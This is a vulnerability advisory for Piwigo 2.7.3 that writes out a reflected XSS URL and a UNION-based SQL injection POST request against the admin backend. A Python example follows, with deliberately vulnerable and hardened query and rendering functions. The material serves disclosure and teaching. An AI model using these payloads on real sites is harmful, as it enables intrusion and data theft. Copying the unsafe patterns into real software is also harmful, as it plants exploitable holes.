CMS Piwigo 2.7.3 Cross Site Scripting / SQL Injection

Published: 18 Feb 2015 00:00:00
Reported by: Steffen Roesemann
Type: packetstorm
Source: packetstormsecurity.com

CMS Piwigo 2.7.3 XSS and SQL Injection

```text
Advisory: Reflected XSS and SQL injection vulnerability in CMS Piwigo <= v. 2.7.3
Advisory ID: SROEADV-2015-06
Author: Steffen Rösemann
Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)
Vendor URL: http://piwigo.org
Vendor Status: patched
CVE-ID: -

==========================
Vulnerability Description:
==========================

Piwigo <= v. 2.7.3 suffers from a reflected XSS and a SQL injection in its
administrative backend.

==================
Technical Details:
==================

The reflected XSS vulnerability resides in the "page" parameter of the file
admin.php, which belongs to the administrative backend and is reached at the
following URL in a common Piwigo installation:

http://{TARGET}/admin.php?page=plugin-AdminTools

Exploit example:

http://{TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E

The SQL injection vulnerability is likewise located in the administrative
backend, in the "History" functionality:

http://{TARGET}/admin.php?page=history

It can be exploited by appending arbitrary SQL statements to the parameter
"user" in a POST request:

Exploit example:

POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=19rpao6bhdsn3l0u0o1im4m680; _pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2) AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 -- &image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit

=========
Solution:
=========

Install the latest version 2.7.4 (released 17th February 2015).


====================
Disclosure Timeline:
====================
08-Jan-2015 - found the vulnerability
09-Jan-2015 - informed the developers
09-Jan-2015 - release date of this security advisory [without technical
details]
09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)
17-Feb-2015 - vendor releases patch 2.7.4 (see [3])
17-Feb-2015 - release date of this security advisory
17-Feb-2015 - sent to Full Disclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://piwigo.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html
[3] http://piwigo.org/forum/viewtopic.php?id=25179
```
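The two bugs the advisory describes are textbook instances of their classes: a request value spliced into a SQL string (the `user` filter of the History page) and a request value reflected verbatim into HTML (the `page` parameter of admin.php). The following Python is an added illustration of those two patterns and their hardened forms; it is not Piwigo's code and does not reproduce Piwigo's schema or handlers. The table, the function names and the sample payloads are all constructed for the example; the SQL payload keeps only the shape of the advisory's (close the parenthesised filter, append a UNION), and the XSS payload is a plain `<img onerror>` tag rather than the encoded one above.

```python
import html
import re
import sqlite3

# Constructed sample data (not Piwigo's real schema): a tiny "history" table
# standing in for the one the History page filters by user.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE history (id INTEGER PRIMARY KEY, user_id INTEGER, ip TEXT)"
    )
    conn.executemany(
        "INSERT INTO history (user_id, ip) VALUES (?, ?)",
        [(1, "10.0.0.1"), (2, "10.0.0.2"), (3, "10.0.0.3")],
    )
    return conn

# Constructed inputs with the same shape as the advisory's payloads: the SQL
# one closes the parenthesised filter and appends a UNION; the XSS one appends
# an <img onerror> tag to a legitimate page name.
INJECTED_USER = "2) AND 1=2 UNION SELECT 1,2,3 --"
XSS_PAGE = "plugin-AdminTools<img src=n onerror=alert(1)>"

def history_filter_unsafe(conn, user):
    """Hypothetical vulnerable pattern: the request value is spliced into SQL."""
    sql = "SELECT id, user_id, ip FROM history WHERE (user_id = %s)" % user
    return conn.execute(sql).fetchall()

def history_filter_safe(conn, user):
    """Hardened form: enforce the expected type, then bind the value."""
    try:
        user_id = int(user)
    except (TypeError, ValueError):
        raise ValueError("user must be an integer id")
    return conn.execute(
        "SELECT id, user_id, ip FROM history WHERE user_id = ?", (user_id,)
    ).fetchall()

def safe_rejects(conn, user):
    """True if the hardened filter refuses the value instead of running it."""
    try:
        history_filter_safe(conn, user)
    except ValueError:
        return True
    return False

# Allowlist for a parameter whose only job is to select an admin page.
PAGE_NAME_RE = re.compile(r"[A-Za-z0-9_-]+")

def is_valid_page_name(page):
    return PAGE_NAME_RE.fullmatch(page) is not None

def render_page_title_unsafe(page):
    """Hypothetical vulnerable pattern: the parameter is reflected verbatim."""
    return "<h1>Admin: %s</h1>" % page

def render_page_title_safe(page):
    """Hardened form: HTML-encode before reflecting into the response body."""
    return "<h1>Admin: %s</h1>" % html.escape(page, quote=True)

if __name__ == "__main__":
    conn = make_db()
    print(history_filter_unsafe(conn, INJECTED_USER))  # the UNION row comes back
    print(safe_rejects(conn, INJECTED_USER))           # True
    print(render_page_title_unsafe(XSS_PAGE))          # live <img onerror=...> tag
    print(render_page_title_safe(XSS_PAGE))            # &lt;img ...&gt; inert text
```

Binding alone would already stop the UNION from executing, because the whole string is compared as one value; the integer cast on top of it turns a malformed filter into a rejected request, which is also the event a defender wants logged. For the `page` parameter, output encoding is the fix for the reflection itself, and the allowlist check is the cheaper control to apply first, since no legitimate admin page name contains angle brackets.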
